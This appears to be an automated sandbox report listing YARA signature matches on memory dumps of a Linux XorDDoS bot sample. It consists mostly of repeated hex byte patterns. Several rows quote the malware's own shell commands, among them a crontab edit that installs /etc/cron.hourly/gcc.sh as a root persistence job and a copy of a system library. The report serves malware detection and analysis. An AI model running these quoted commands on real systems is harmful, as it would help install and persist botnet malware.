6251.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6251.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6309.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6309.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6309.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6309.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6309.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6309.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6309.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6254.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6254.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6254.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6254.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6254.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6254.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6254.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6388.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6371.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6380.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6380.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6380.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6380.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6380.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6380.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6380.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6248.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6248.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6248.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6248.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6248.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6248.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6248.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6246.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6298.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6383.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Process Memory Space: dptxrnhxmx.elf PID: 6208	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6208	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6210	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6210	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd4c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe29:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6211	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6211	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd93:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe70:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6212	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6212	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1559:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1636:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6243	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6243	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa8d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6246	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6246	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31b5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3292:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6248	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6248	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3656:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3733:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6251	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6251	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x354b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3628:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6254	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6254	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3656:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3733:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6298	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6298	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3664:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3741:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6301	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6301	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa8d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6304	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6304	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6307	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6307	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x354b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3628:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6309	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6309	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3656:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3733:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6316	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6316	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3656:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3733:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6319	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6319	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa8d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6322	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6322	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa8d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6325	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6325	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xe5d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xf3a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6327	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6327	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d8b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e68:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6337	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6337	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1072:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x114f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6340	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6340	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa8d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6343	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6343	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x31b5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3292:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6346	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6346	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xe58:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xf35:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6348	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6348	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: dptxrnhxmx.elf PID: 6354	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: dptxrnhxmx.elf PID: 6354	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xe57:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xf34:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
